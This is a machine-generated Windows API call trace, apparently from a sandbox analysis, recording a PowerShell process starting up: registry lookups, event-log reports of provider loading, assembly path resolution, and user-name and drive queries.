	[0167.843] RegOpenKeyExW (in: hKey=0x3b8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9b0 | out: phkResult=0xce9b0*=0x0) returned 0x2
	[0167.843] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9b0 | out: phkResult=0xce9b0*=0x3bc) returned 0x0
	[0167.843] RegOpenKeyExW (in: hKey=0x3bc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9b0 | out: phkResult=0xce9b0*=0x0) returned 0x2
	[0167.844] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9b0 | out: phkResult=0xce9b0*=0x3c0) returned 0x0
	[0167.844] RegOpenKeyExW (in: hKey=0x3c0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9b0 | out: phkResult=0xce9b0*=0x0) returned 0x2
	[0167.844] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9b0 | out: phkResult=0xce9b0*=0x3c4) returned 0x0
	[0167.844] RegOpenKeyExW (in: hKey=0x3c4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9b0 | out: phkResult=0xce9b0*=0x0) returned 0x2
	[0167.844] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9b0 | out: phkResult=0xce9b0*=0x3c8) returned 0x0
	[0167.845] RegOpenKeyExW (in: hKey=0x3c8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9b0 | out: phkResult=0xce9b0*=0x0) returned 0x2
	[0167.845] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9b0 | out: phkResult=0xce9b0*=0x3cc) returned 0x0
	[0167.845] RegOpenKeyExW (in: hKey=0x3cc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9b0 | out: phkResult=0xce9b0*=0x3d0) returned 0x0
	[0167.845] RegCloseKey (hKey=0x3d0) returned 0x0
	[0167.845] RegCloseKey (hKey=0x3ac) returned 0x0
	[0167.846] RegCloseKey (hKey=0x3cc) returned 0x0
	[0168.138] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x4f80004
	[0168.303] GetLastError () returned 0x0
	[0168.305] ReportEventW (hEventLog=0x4f80004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d20964*="WSMan", lpRawData=0x2d2080c) returned 1
	[0168.312] GetLastError () returned 0x0
	[0168.313] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0168.313] GetLastError () returned 0xcb
	[0168.314] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce524, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0168.314] GetLastError () returned 0xcb
	[0168.314] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce4d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0168.314] GetLastError () returned 0xcb
	[0168.314] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce4d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0168.314] GetLastError () returned 0xcb
	[0168.314] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x338408, nSize=0xceb24 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xceb24) returned 0x1
	[0168.466] GetLastError () returned 0xcb
	[0168.467] GetUserNameW (in: lpBuffer=0x337c48, pcbBuffer=0xceb2c | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xceb2c) returned 1
	[0168.467] ReportEventW (hEventLog=0x4f80004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d24840*="Alias", lpRawData=0x2d246fc) returned 1
	[0168.476] GetLastError () returned 0x0
	[0168.477] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0168.477] GetLastError () returned 0xcb
	[0168.478] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce524, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0168.478] GetLastError () returned 0xcb
	[0168.478] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce4d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0168.478] GetLastError () returned 0xcb
	[0168.478] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce4d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0168.478] GetLastError () returned 0xcb
	[0168.478] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x338408, nSize=0xceb24 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xceb24) returned 0x1
	[0168.479] GetLastError () returned 0xcb
	[0168.479] GetUserNameW (in: lpBuffer=0x337c48, pcbBuffer=0xceb2c | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xceb2c) returned 1
	[0168.479] ReportEventW (hEventLog=0x4f80004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d287d4*="Environment", lpRawData=0x2d28690) returned 1
	[0168.528] GetLastError () returned 0x0
	[0168.529] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0168.529] GetLastError () returned 0xcb
	[0168.531] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0168.531] GetLastError () returned 0xcb
	[0168.531] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0168.531] GetLastError () returned 0xcb
	[0168.531] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0xce654, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0168.531] GetLastError () returned 0xcb
	[0168.531] SetErrorMode (uMode=0x1) returned 0x1
	[0168.531] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0xcead4 | out: lpFileInformation=0xcead4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0168.531] GetLastError () returned 0xcb
	[0168.531] SetErrorMode (uMode=0x1) returned 0x1
	[0168.532] GetLogicalDrives () returned 0x4
	[0168.532] GetLastError () returned 0xcb
	[0168.533] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xce578, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0168.533] GetLastError () returned 0xcb
	[0168.535] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0168.535] GetLastError () returned 0xcb
	[0168.535] SetErrorMode (uMode=0x1) returned 0x1
	[0168.537] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x337d48, nVolumeNameSize=0x32, lpVolumeSerialNumber=0xceaa0, lpMaximumComponentLength=0xcea9c, lpFileSystemFlags=0xcea98, lpFileSystemNameBuffer=0x337c48, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xceaa0*=0x9c354b42, lpMaximumComponentLength=0xcea9c*=0xff, lpFileSystemFlags=0xcea98*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0168.538] GetLastError () returned 0xcb
	[0168.538] SetErrorMode (uMode=0x1) returned 0x1
	[0168.538] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0168.538] GetLastError () returned 0xcb
	[0168.538] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xce600, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0168.538] GetLastError () returned 0xcb
	[0168.538] SetErrorMode (uMode=0x1) returned 0x1
	[0168.538] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x2d29a0c | out: lpFileInformation=0x2d29a0c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0168.538] GetLastError () returned 0xcb
	[0168.538] SetErrorMode (uMode=0x1) returned 0x1
	[0168.538] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xce600, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0168.538] GetLastError () returned 0xcb
	[0168.538] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xce58c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0168.538] GetLastError () returned 0xcb
	[0168.538] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0168.539] GetLastError () returned 0xcb
	[0168.540] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xce548, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0168.540] GetLastError () returned 0xcb
	[0168.540] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0168.540] GetLastError () returned 0xcb
	[0168.541] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xce550, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0168.541] GetLastError () returned 0xcb
	[0168.541] SetErrorMode (uMode=0x1) returned 0x1
	[0168.541] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x2d2a664 | out: lpFileInformation=0x2d2a664*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0168.541] GetLastError () returned 0xcb
	[0168.541] SetErrorMode (uMode=0x1) returned 0x1
	[0168.541] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xce558, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0168.541] GetLastError () returned 0xcb
	[0168.542] SetErrorMode (uMode=0x1) returned 0x1
	[0168.542] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x2d2a7b4 | out: lpFileInformation=0x2d2a7b4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0168.542] GetLastError () returned 0xcb
	[0168.542] SetErrorMode (uMode=0x1) returned 0x1
	[0168.542] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xce59c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0168.542] GetLastError () returned 0xcb
	[0168.542] SetErrorMode (uMode=0x1) returned 0x1
	[0168.542] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x2d2a954 | out: lpFileInformation=0x2d2a954*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0168.542] GetLastError () returned 0xcb
	[0168.542] SetErrorMode (uMode=0x1) returned 0x1
	[0168.542] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x338408, nSize=0xceb24 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xceb24) returned 0x1
	[0168.543] GetLastError () returned 0xcb
	[0168.543] GetUserNameW (in: lpBuffer=0x337c48, pcbBuffer=0xceb2c | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xceb2c) returned 1
	[0168.544] ReportEventW (hEventLog=0x4f80004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d2d6dc*="FileSystem", lpRawData=0x2d2d598) returned 1
	[0168.548] GetLastError () returned 0x0
	[0168.549] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0168.549] GetLastError () returned 0xcb
	[0168.550] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0168.550] GetLastError () returned 0xcb
	[0168.550] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0168.551] GetLastError () returned 0xcb
	[0168.551] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0168.551] GetLastError () returned 0xcb
	[0168.551] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x338408, nSize=0xceb24 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xceb24) returned 0x1
	[0168.551] GetLastError () returned 0xcb
	[0168.551] GetUserNameW (in: lpBuffer=0x337c48, pcbBuffer=0xceb2c | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xceb2c) returned 1
	[0168.552] ReportEventW (hEventLog=0x4f80004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d317cc*="Function", lpRawData=0x2d31688) returned 1
	[0168.575] GetLastError () returned 0x0
	[0168.578] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0168.578] GetLastError () returned 0xcb
	[0168.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce538, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0168.584] GetLastError () returned 0xcb
	[0168.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce4e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0168.584] GetLastError () returned 0xcb
	[0168.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce4e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0168.584] GetLastError () returned 0xcb
	[0168.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce4e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0168.584] GetLastError () returned 0xcb
	[0169.116] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce538, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0169.116] GetLastError () returned 0xcb
	[0169.116] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce4e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0169.116] GetLastError () returned 0xcb
	[0169.116] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce4e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0169.117] GetLastError () returned 0xcb
	[0169.118] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x338408, nSize=0xceb24 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xceb24) returned 0x1
	[0169.120] GetLastError () returned 0xcb
	[0169.120] GetUserNameW (in: lpBuffer=0x337c48, pcbBuffer=0xceb2c | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xceb2c) returned 1
	[0169.121] ReportEventW (hEventLog=0x4f80004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d4a888*="Registry", lpRawData=0x2d4a744) returned 1
	[0169.246] GetLastError () returned 0x0
	[0169.247] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce524, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0169.247] GetLastError () returned 0x0
	[0169.247] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce4d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0169.248] GetLastError () returned 0x0
	[0169.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce4d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0169.248] GetLastError () returned 0x0
	[0169.262] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x338408, nSize=0xceb24 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xceb24) returned 0x1
	[0169.263] GetLastError () returned 0x0
	[0169.263] GetUserNameW (in: lpBuffer=0x337c48, pcbBuffer=0xceb2c | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xceb2c) returned 1
	[0169.264] ReportEventW (hEventLog=0x4f80004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d4e670*="Variable", lpRawData=0x2d4e52c) returned 1
	[0169.384] GetLastError () returned 0x0
	[0169.386] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0169.386] GetLastError () returned 0xcb
	[0169.400] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0169.400] GetLastError () returned 0xcb
	[0169.402] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xce524, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0169.402] GetLastError () returned 0xcb
	[0169.402] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xce4d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0169.402] GetLastError () returned 0xcb
	[0169.402] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xce4d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0169.402] GetLastError () returned 0xcb
	[0169.402] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xce4d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0169.403] GetLastError () returned 0xcb
	[0170.246] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x338408, nSize=0xceb24 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xceb24) returned 0x1
	[0170.246] GetLastError () returned 0x3
	[0170.246] GetUserNameW (in: lpBuffer=0x337c48, pcbBuffer=0xceb2c | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xceb2c) returned 1
	[0170.247] ReportEventW (hEventLog=0x4f80004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2bc9388*="Certificate", lpRawData=0x2bc9244) returned 1
	[0170.400] GetLastError () returned 0x0
	[0170.412] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0170.412] GetLastError () returned 0xcb
	[0170.417] GetLogicalDrives () returned 0x4
	[0170.417] GetLastError () returned 0xcb
	[0170.417] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xce69c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0170.417] GetLastError () returned 0xcb
	[0170.417] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0170.417] GetLastError () returned 0xcb
	[0170.418] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x337c48 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0170.418] GetLastError () returned 0xcb
	[0170.420] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0170.420] GetLastError () returned 0xcb
	[0170.420] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0170.420] GetLastError () returned 0xcb
	[0170.471] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0170.471] GetLastError () returned 0xcb
